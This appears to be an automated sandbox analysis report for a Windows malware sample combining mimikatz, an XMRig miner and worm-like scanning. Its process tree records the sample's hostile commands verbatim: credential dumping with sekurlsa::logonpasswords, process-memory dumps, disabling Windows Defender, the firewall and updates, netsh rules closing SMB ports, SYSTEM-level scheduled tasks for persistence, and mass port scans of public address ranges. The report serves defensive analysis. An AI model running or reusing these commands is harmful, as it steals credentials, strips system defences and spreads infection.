Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    03-05-2024 04:56

General

  • Target

    2024-05-03_5e6a68f105d95ba6c52387c649436358_hacktools_icedid_mimikatz.exe

  • Size

    8.9MB

  • MD5

    5e6a68f105d95ba6c52387c649436358

  • SHA1

    cff5c065b237b0d7711748961e7468bba5e5fc68

  • SHA256

    273c5e335b5e885b8c77a2359e2a6f1e85c6cbb824be027c30fcb2ecd3bf3da6

  • SHA512

    5f118f39ef05fdcc9c4727d46da3385c8594dc103edc179ca1ae7a7c908399c870ee13f9d4ba490c8a01af5f0486961e5d7e0e162f2dd05552b55f556a177faf

  • SSDEEP

    196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (26172) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
  • UPX dump on OEP (original entry point) 34 IoCs
  • XMRig Miner payload 12 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 6 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Sets file execution options in registry 2 TTPs 40 IoCs
  • Executes dropped EXE 16 IoCs
  • Loads dropped DLL 22 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Creates a Windows Service
  • Drops file in System32 directory 12 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • NSIS installer 3 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 14 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 31 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:288
      • C:\Windows\TEMP\rpbbiqrft\iblrke.exe
        "C:\Windows\TEMP\rpbbiqrft\iblrke.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:3008
    • C:\Users\Admin\AppData\Local\Temp\2024-05-03_5e6a68f105d95ba6c52387c649436358_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-05-03_5e6a68f105d95ba6c52387c649436358_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2404
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\vlucllpw\bbibgge.exe
        2⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2204
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • Runs ping.exe
          PID:1028
        • C:\Windows\vlucllpw\bbibgge.exe
          C:\Windows\vlucllpw\bbibgge.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:2248
    • C:\Windows\vlucllpw\bbibgge.exe
      C:\Windows\vlucllpw\bbibgge.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Sets file execution options in registry
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2676
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2624
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:2756
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
            3⤵
              PID:2752
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
                PID:2788
              • C:\Windows\SysWOW64\cacls.exe
                cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                3⤵
                  PID:2708
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                    PID:2800
                  • C:\Windows\SysWOW64\cacls.exe
                    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                    3⤵
                      PID:2504
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static del all
                    2⤵
                    • Modifies data under HKEY_USERS
                    PID:2520
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add policy name=Bastards description=FuckingBastards
                    2⤵
                    • Modifies data under HKEY_USERS
                    PID:2540
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filteraction name=BastardsList action=block
                    2⤵
                    • Modifies data under HKEY_USERS
                    PID:3068
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c C:\Windows\gtbtbtiti\ferwkwttm\wpcap.exe /S
                    2⤵
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:2884
                    • C:\Windows\gtbtbtiti\ferwkwttm\wpcap.exe
                      C:\Windows\gtbtbtiti\ferwkwttm\wpcap.exe /S
                      3⤵
                      • Drops file in Drivers directory
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Drops file in System32 directory
                      • Drops file in Program Files directory
                      • Suspicious use of WriteProcessMemory
                      PID:2996
                      • C:\Windows\SysWOW64\net.exe
                        net stop "Boundary Meter"
                        4⤵
                          PID:2008
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 stop "Boundary Meter"
                            5⤵
                              PID:2184
                          • C:\Windows\SysWOW64\net.exe
                            net stop "TrueSight Meter"
                            4⤵
                              PID:1444
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop "TrueSight Meter"
                                5⤵
                                  PID:2452
                              • C:\Windows\SysWOW64\net.exe
                                net stop npf
                                4⤵
                                  PID:2812
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop npf
                                    5⤵
                                      PID:2568
                                  • C:\Windows\SysWOW64\net.exe
                                    net start npf
                                    4⤵
                                      PID:1628
                                      • C:\Windows\SysWOW64\net1.exe
                                        C:\Windows\system32\net1 start npf
                                        5⤵
                                          PID:2120
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c net start npf
                                    2⤵
                                      PID:2288
                                      • C:\Windows\SysWOW64\net.exe
                                        net start npf
                                        3⤵
                                          PID:2952
                                          • C:\Windows\SysWOW64\net1.exe
                                            C:\Windows\system32\net1 start npf
                                            4⤵
                                              PID:1980
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /c net start npf
                                          2⤵
                                            PID:2164
                                            • C:\Windows\SysWOW64\net.exe
                                              net start npf
                                              3⤵
                                                PID:2948
                                                • C:\Windows\SysWOW64\net1.exe
                                                  C:\Windows\system32\net1 start npf
                                                  4⤵
                                                    PID:2200
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c C:\Windows\gtbtbtiti\ferwkwttm\ubltspefw.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\gtbtbtiti\ferwkwttm\Scant.txt
                                                2⤵
                                                • Loads dropped DLL
                                                PID:680
                                                • C:\Windows\gtbtbtiti\ferwkwttm\ubltspefw.exe
                                                  C:\Windows\gtbtbtiti\ferwkwttm\ubltspefw.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\gtbtbtiti\ferwkwttm\Scant.txt
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  PID:856
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c C:\Windows\gtbtbtiti\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\gtbtbtiti\Corporate\log.txt
                                                2⤵
                                                • Loads dropped DLL
                                                • Drops file in Windows directory
                                                PID:1340
                                                • C:\Windows\gtbtbtiti\Corporate\vfshost.exe
                                                  C:\Windows\gtbtbtiti\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:908
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "elucnzufu" /ru system /tr "cmd /c C:\Windows\ime\bbibgge.exe"
                                                2⤵
                                                  PID:1868
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                    3⤵
                                                      PID:784
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /create /sc minute /mo 1 /tn "elucnzufu" /ru system /tr "cmd /c C:\Windows\ime\bbibgge.exe"
                                                      3⤵
                                                      • Creates scheduled task(s)
                                                      PID:1452
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "llmbfteeq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\vlucllpw\bbibgge.exe /p everyone:F"
                                                    2⤵
                                                      PID:2944
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                        3⤵
                                                          PID:2416
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          schtasks /create /sc minute /mo 1 /tn "llmbfteeq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\vlucllpw\bbibgge.exe /p everyone:F"
                                                          3⤵
                                                          • Creates scheduled task(s)
                                                          PID:2116
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "qieiimgin" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\rpbbiqrft\iblrke.exe /p everyone:F"
                                                        2⤵
                                                          PID:568
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                            3⤵
                                                              PID:1784
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              schtasks /create /sc minute /mo 1 /tn "qieiimgin" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\rpbbiqrft\iblrke.exe /p everyone:F"
                                                              3⤵
                                                              • Creates scheduled task(s)
                                                              PID:2148
                                                          • C:\Windows\SysWOW64\netsh.exe
                                                            netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                                                            2⤵
                                                            • Modifies data under HKEY_USERS
                                                            PID:696
                                                          • C:\Windows\SysWOW64\netsh.exe
                                                            netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                                                            2⤵
                                                              PID:1592
                                                            • C:\Windows\SysWOW64\netsh.exe
                                                              netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                              2⤵
                                                              • Modifies data under HKEY_USERS
                                                              PID:2404
                                                            • C:\Windows\SysWOW64\netsh.exe
                                                              netsh ipsec static set policy name=Bastards assign=y
                                                              2⤵
                                                              • Modifies data under HKEY_USERS
                                                              PID:2428
                                                            • C:\Windows\SysWOW64\netsh.exe
                                                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                                                              2⤵
                                                                PID:2896
                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                                                                2⤵
                                                                • Modifies data under HKEY_USERS
                                                                PID:2600
                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                2⤵
                                                                • Modifies data under HKEY_USERS
                                                                PID:2616
                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                netsh ipsec static set policy name=Bastards assign=y
                                                                2⤵
                                                                • Modifies data under HKEY_USERS
                                                                PID:2396
                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                                                                2⤵
                                                                • Modifies data under HKEY_USERS
                                                                PID:2520
                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                                                                2⤵
                                                                • Modifies data under HKEY_USERS
                                                                PID:2540
                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                2⤵
                                                                  PID:3068
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh ipsec static set policy name=Bastards assign=y
                                                                  2⤵
                                                                  • Modifies data under HKEY_USERS
                                                                  PID:2860
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd /c net stop SharedAccess
                                                                  2⤵
                                                                    PID:1716
                                                                    • C:\Windows\SysWOW64\net.exe
                                                                      net stop SharedAccess
                                                                      3⤵
                                                                        PID:1720
                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                          C:\Windows\system32\net1 stop SharedAccess
                                                                          4⤵
                                                                            PID:900
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd /c netsh firewall set opmode mode=disable
                                                                        2⤵
                                                                          PID:1988
                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                            netsh firewall set opmode mode=disable
                                                                            3⤵
                                                                            • Modifies Windows Firewall
                                                                            PID:2008
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd /c netsh Advfirewall set allprofiles state off
                                                                          2⤵
                                                                            PID:1672
                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                              netsh Advfirewall set allprofiles state off
                                                                              3⤵
                                                                              • Modifies Windows Firewall
                                                                              PID:2440
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            cmd /c net stop MpsSvc
                                                                            2⤵
                                                                              PID:2812
                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                net stop MpsSvc
                                                                                3⤵
                                                                                  PID:1688
                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                    C:\Windows\system32\net1 stop MpsSvc
                                                                                    4⤵
                                                                                      PID:2200
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd /c net stop WinDefend
                                                                                  2⤵
                                                                                    PID:2824
                                                                                    • C:\Windows\SysWOW64\net.exe
                                                                                      net stop WinDefend
                                                                                      3⤵
                                                                                        PID:2900
                                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                                          C:\Windows\system32\net1 stop WinDefend
                                                                                          4⤵
                                                                                            PID:2288
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        cmd /c net stop wuauserv
                                                                                        2⤵
                                                                                          PID:1924
                                                                                          • C:\Windows\SysWOW64\net.exe
                                                                                            net stop wuauserv
                                                                                            3⤵
                                                                                              PID:2244
                                                                                              • C:\Windows\SysWOW64\net1.exe
                                                                                                C:\Windows\system32\net1 stop wuauserv
                                                                                                4⤵
                                                                                                  PID:2948
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              cmd /c sc config MpsSvc start= disabled
                                                                                              2⤵
                                                                                                PID:1616
                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                  sc config MpsSvc start= disabled
                                                                                                  3⤵
                                                                                                  • Launches sc.exe
                                                                                                  PID:1980
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd /c sc config SharedAccess start= disabled
                                                                                                2⤵
                                                                                                  PID:1548
                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                    sc config SharedAccess start= disabled
                                                                                                    3⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:2940
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  cmd /c sc config WinDefend start= disabled
                                                                                                  2⤵
                                                                                                    PID:1568
                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                      sc config WinDefend start= disabled
                                                                                                      3⤵
                                                                                                      • Launches sc.exe
                                                                                                      PID:2952
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    cmd /c sc config wuauserv start= disabled
                                                                                                    2⤵
                                                                                                      PID:2120
                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                        sc config wuauserv start= disabled
                                                                                                        3⤵
                                                                                                        • Launches sc.exe
                                                                                                        PID:888
                                                                                                    • C:\Windows\TEMP\xohudmc.exe
                                                                                                      C:\Windows\TEMP\xohudmc.exe
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Drops file in System32 directory
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:324
                                                                                                    • C:\Windows\TEMP\gtbtbtiti\fableieee.exe
                                                                                                      C:\Windows\TEMP\gtbtbtiti\fableieee.exe -accepteula -mp 288 C:\Windows\TEMP\gtbtbtiti\288.dmp
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:3060
                                                                                                    • C:\Windows\TEMP\gtbtbtiti\fableieee.exe
                                                                                                      C:\Windows\TEMP\gtbtbtiti\fableieee.exe -accepteula -mp 1112 C:\Windows\TEMP\gtbtbtiti\1112.dmp
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1648
                                                                                                    • C:\Windows\TEMP\gtbtbtiti\fableieee.exe
                                                                                                      C:\Windows\TEMP\gtbtbtiti\fableieee.exe -accepteula -mp 1176 C:\Windows\TEMP\gtbtbtiti\1176.dmp
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:2024
                                                                                                    • C:\Windows\TEMP\gtbtbtiti\fableieee.exe
                                                                                                      C:\Windows\TEMP\gtbtbtiti\fableieee.exe -accepteula -mp 1256 C:\Windows\TEMP\gtbtbtiti\1256.dmp
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:2212
                                                                                                    • C:\Windows\TEMP\gtbtbtiti\fableieee.exe
                                                                                                      C:\Windows\TEMP\gtbtbtiti\fableieee.exe -accepteula -mp 2128 C:\Windows\TEMP\gtbtbtiti\2128.dmp
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:568
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd.exe /c C:\Windows\gtbtbtiti\ferwkwttm\scan.bat
                                                                                                      2⤵
                                                                                                      • Loads dropped DLL
                                                                                                      PID:2348
                                                                                                      • C:\Windows\gtbtbtiti\ferwkwttm\zrrfwbgsc.exe
                                                                                                        zrrfwbgsc.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Drops file in Windows directory
                                                                                                        PID:2772
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                                      2⤵
                                                                                                        PID:3192
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                          3⤵
                                                                                                            PID:3408
                                                                                                          • C:\Windows\SysWOW64\cacls.exe
                                                                                                            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                                                                                            3⤵
                                                                                                              PID:3432
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                              3⤵
                                                                                                                PID:2316
                                                                                                              • C:\Windows\SysWOW64\cacls.exe
                                                                                                                cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                                                                                                3⤵
                                                                                                                  PID:1668
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                  3⤵
                                                                                                                    PID:2852
                                                                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                                                                    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                                                    3⤵
                                                                                                                      PID:3524
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
                                                                                                                  1⤵
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:2584
                                                                                                                • C:\Windows\SysWOW64\rifzsk.exe
                                                                                                                  C:\Windows\SysWOW64\rifzsk.exe
                                                                                                                  1⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                  PID:680
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                                                                                                                  1⤵
                                                                                                                    PID:2208
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                                                                                                                    1⤵
                                                                                                                      PID:2632
                                                                                                                    • C:\Windows\system32\taskeng.exe
                                                                                                                      taskeng.exe {177FC278-49D4-4466-B654-E42A4D9ECC34} S-1-5-18:NT AUTHORITY\System:Service:
                                                                                                                      1⤵
                                                                                                                        PID:2480
                                                                                                                        • C:\Windows\system32\cmd.EXE
                                                                                                                          C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\vlucllpw\bbibgge.exe /p everyone:F
                                                                                                                          2⤵
                                                                                                                            PID:2468
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                              3⤵
                                                                                                                                PID:2852
                                                                                                                              • C:\Windows\system32\cacls.exe
                                                                                                                                cacls C:\Windows\vlucllpw\bbibgge.exe /p everyone:F
                                                                                                                                3⤵
                                                                                                                                  PID:1560
                                                                                                                              • C:\Windows\system32\cmd.EXE
                                                                                                                                C:\Windows\system32\cmd.EXE /c C:\Windows\ime\bbibgge.exe
                                                                                                                                2⤵
                                                                                                                                  PID:2588
                                                                                                                                  • C:\Windows\ime\bbibgge.exe
                                                                                                                                    C:\Windows\ime\bbibgge.exe
                                                                                                                                    3⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                    PID:1828
                                                                                                                                • C:\Windows\system32\cmd.EXE
                                                                                                                                  C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\rpbbiqrft\iblrke.exe /p everyone:F
                                                                                                                                  2⤵
                                                                                                                                    PID:1316
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                      3⤵
                                                                                                                                        PID:304
                                                                                                                                      • C:\Windows\system32\cacls.exe
                                                                                                                                        cacls C:\Windows\TEMP\rpbbiqrft\iblrke.exe /p everyone:F
                                                                                                                                        3⤵
                                                                                                                                          PID:2988
                                                                                                                                      • C:\Windows\system32\cmd.EXE
                                                                                                                                        C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\vlucllpw\bbibgge.exe /p everyone:F
                                                                                                                                        2⤵
                                                                                                                                          PID:3948
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                            3⤵
                                                                                                                                              PID:3064
                                                                                                                                            • C:\Windows\system32\cacls.exe
                                                                                                                                              cacls C:\Windows\vlucllpw\bbibgge.exe /p everyone:F
                                                                                                                                              3⤵
                                                                                                                                                PID:4068
                                                                                                                                            • C:\Windows\system32\cmd.EXE
                                                                                                                                              C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\rpbbiqrft\iblrke.exe /p everyone:F
                                                                                                                                              2⤵
                                                                                                                                                PID:1596
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                  3⤵
                                                                                                                                                    PID:1712
                                                                                                                                                  • C:\Windows\system32\cacls.exe
                                                                                                                                                    cacls C:\Windows\TEMP\rpbbiqrft\iblrke.exe /p everyone:F
                                                                                                                                                    3⤵
                                                                                                                                                      PID:4024
                                                                                                                                                  • C:\Windows\system32\cmd.EXE
                                                                                                                                                    C:\Windows\system32\cmd.EXE /c C:\Windows\ime\bbibgge.exe
                                                                                                                                                    2⤵
                                                                                                                                                      PID:2208
                                                                                                                                                      • C:\Windows\ime\bbibgge.exe
                                                                                                                                                        C:\Windows\ime\bbibgge.exe
                                                                                                                                                        3⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                        PID:2520
                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                    C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                                                                                                                                                    1⤵
                                                                                                                                                      PID:2928

                                                                                                                                                    Network

                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                    Execution

                                                                                                                                                    System Services

                                                                                                                                                    1
                                                                                                                                                    T1569

                                                                                                                                                    Service Execution

                                                                                                                                                    1
                                                                                                                                                    T1569.002

                                                                                                                                                    Scheduled Task/Job

                                                                                                                                                    1
                                                                                                                                                    T1053

                                                                                                                                                    Persistence

                                                                                                                                                    Create or Modify System Process

                                                                                                                                                    2
                                                                                                                                                    T1543

                                                                                                                                                    Windows Service

                                                                                                                                                    2
                                                                                                                                                    T1543.003

                                                                                                                                                    Boot or Logon Autostart Execution

                                                                                                                                                    1
                                                                                                                                                    T1547

                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                    1
                                                                                                                                                    T1547.001

                                                                                                                                                    Scheduled Task/Job

                                                                                                                                                    1
                                                                                                                                                    T1053

                                                                                                                                                    Privilege Escalation

                                                                                                                                                    Create or Modify System Process

                                                                                                                                                    2
                                                                                                                                                    T1543

                                                                                                                                                    Windows Service

                                                                                                                                                    2
                                                                                                                                                    T1543.003

                                                                                                                                                    Boot or Logon Autostart Execution

                                                                                                                                                    1
                                                                                                                                                    T1547

                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                    1
                                                                                                                                                    T1547.001

                                                                                                                                                    Scheduled Task/Job

                                                                                                                                                    1
                                                                                                                                                    T1053

                                                                                                                                                    Defense Evasion

                                                                                                                                                    Impair Defenses

                                                                                                                                                    1
                                                                                                                                                    T1562

                                                                                                                                                    Disable or Modify System Firewall

                                                                                                                                                    1
                                                                                                                                                    T1562.004

                                                                                                                                                    Modify Registry

                                                                                                                                                    2
                                                                                                                                                    T1112

                                                                                                                                                    Subvert Trust Controls

                                                                                                                                                    1
                                                                                                                                                    T1553

                                                                                                                                                    Install Root Certificate

                                                                                                                                                    1
                                                                                                                                                    T1553.004

                                                                                                                                                    Discovery

                                                                                                                                                    Network Service Discovery

                                                                                                                                                    2
